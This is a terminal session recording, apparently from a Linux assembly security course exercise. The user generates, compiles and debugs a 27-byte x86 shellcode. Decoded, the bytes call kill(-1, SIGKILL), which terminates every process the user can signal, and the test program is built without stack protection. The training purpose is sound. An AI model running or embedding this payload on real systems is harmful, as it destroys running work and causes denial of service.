[20.081339, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh\u001b[1m \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;25H\u001b[?12l\u001b[?25h"]
[20.166899, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[20.167166, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh\u001b[1m \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;25H\u001b[?12l\u001b[?25h"]
[20.311975, "o", "\b s"]
[20.391242, "o", "h"]
[20.551011, "o", "e"]
[20.693995, "o", "l"]
[20.852672, "o", "lcode"]
[21.365902, "o", "."]
[21.503186, "o", "c"]
[22.111461, "o", "\r\n\u001b[?2004l"]
[22.165357, "o", "[*] Compiling shellcode\u001b]0;SLAE ❐ SLAE ● 1 bash\u0007\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m"]
[22.191252, "o", "\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;24H\u001b[?12l\u001b[?25h"]
[22.192915, "o", "\r\n[+] Calling gcc without stack protection\r\n"]
[22.310635, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[22.314035, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[12;1H\u001b[?12l\u001b[?25h"]
[22.409594, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                             \u001b[12;1H \u001b[1;25r\u001b[13;25r\u001b[13S\u001b[12;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\r\n\u001b[37m % \u001b(B\u001b[m\u001b[K\u001b[1;26r\u001b[13;4H\u001b[?2004h"]
[22.471601, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[22.472426, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 bash \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;4H\u001b[?12l\u001b[?25h"]
[24.183218, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;4H\u001b"]
[24.183826, "o", "[?12l\u001b[?25h"]
[24.184127, "o", "g"]
[24.246989, "o", "\bgd"]
[24.263099, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[24.265887, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgd\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;6H\u001b[?12l\u001b[?25h"]
[24.369815, "o", "b"]
[24.386979, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[24.387392, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[13;7H\u001b[?12l\u001b[?25h"]
[24.459558, "o", " "]
[24.768142, "o", "s"]
[24.888025, "o", "h"]
[25.000137, "o", "e"]
[25.57643, "o", "l"]
[26.01237, "o", "lcode"]
[26.573946, "o", "\r\n\u001b[?2004l"]
[26.670761, "o", "Reading symbols from shellcode..."]
[26.67156, "o", "(no debugging symbols found)...done."]
[26.671732, "o", "\r\n"]
[26.678402, "o", "(gdb) "]
[27.696019, "o", "\u001b]0;SLAE ❐ SLAE ● 1 gdb\u0007\u001b[?25l\u001b[26;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;7H\u001b"]
[27.696318, "o", "[?12l\u001b[?25h"]
[27.696724, "o", "b"]
[27.76068, "o", "r"]
[27.790633, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[27.793453, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) br\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;9H\u001b[?12l\u001b[?25h"]
[27.845082, "o", "e"]
[27.966894, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[27.967185, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) bre\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;10H\u001b[?12l\u001b[?25h"]
[28.009351, "o", "a"]
[28.10535, "o", "k"]
[28.169334, "o", " "]
[29.23541, "o", "*"]
[29.449732, "o", "&"]
[29.810105, "o", "c"]
[29.930027, "o", "o"]
[30.066863, "o", "d"]
[30.086388, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[30.086678, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&cod\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;18H\u001b[?12l\u001b[?25h"]
[30.131129, "o", "e"]
[30.21108, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./kill_it_me_softly.py -m\u001b[K\r\nShellcode:  \\x31\\xc0\\x31\\xdb\\x31\\xc9\\x66\\xb8\\x80\\x04\\xb2\\x80\\xf6\\xf2\\x89\\xc1\\x66\\xb8\\xe6\\x0f\\xb2\\x6e\\xf6\\xf2\\x4b\\xcd\\x80\u001b[K\r\nLength:  27\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assig"]
[30.211382, "o", "nment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/kill\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mgdb shellcode\u001b[K\r\nReading symbols from shellcode...(no debugging symbols found)...done.\u001b[K\r\n(gdb) break *&code\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ 